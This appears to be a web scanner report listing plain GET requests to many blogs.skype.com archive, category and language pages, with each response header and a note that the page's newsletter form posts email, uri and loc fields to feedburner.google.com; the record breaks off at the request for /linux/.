GET /en/2011/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:50 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 236737 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:49 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 200715 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:47 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 202770 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:46 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 163214 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:45 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 109054 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:44 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 156054 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/08/using_skype_from_your_home_phone.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:43 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 65611 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:42 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 61636 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2011/09/introducing_skypesupport_on_tw.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:41 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 61925 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/advertising/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:56 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 80983 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/android/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:56 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 104201 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/apps/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:58 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 240757 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/blackberry/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:59 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 67973 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/brew/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:00 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 54209 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/campaigns_and_promotions/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:01 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 175514 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/careers/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:02 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 65154 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/comments.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:54 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 57205 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/corporate/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:03 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 169222 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/education/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:04 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 70824 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/enterprise/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:05 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 72288 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/entertainment/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:06 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 59910 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/events/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:07 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 115014 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/facebook/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:08 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 96175 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/html-guide.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:40:55 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 59019 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/insight/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:09 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 225293 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/iphone/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:10 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 84563 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/life_at_skype/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:11 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 114247 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/mac/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:12 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 102498 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/mobile/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:13 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 264936 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/mwc/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:14 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 60235 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/open_internet/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:15 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 105907 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/palm/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:15 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 59335 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/skype_on_your_tv/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:16 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 105119 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/social_good/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:17 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 72500 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/sony_ericsson/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:18 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 66399 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/subscriptions/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:19 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 107961 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/symbian/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:20 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 66381 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/verizon_wireless/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:21 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 97811 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/wifi/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:21 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 72889 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/windows/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:22 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 71552 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/windows_mobile/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:23 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 61123 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /enterprise/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:21 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 57644 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /es/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:14 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 57359 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /et/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:12 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 55910 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /fr/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:15 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 75359 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /garage/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:05 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 57867 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /it/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:15 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 55500 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /ja/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:12 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 60566 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /ko/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:17 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 54552 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /linux/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
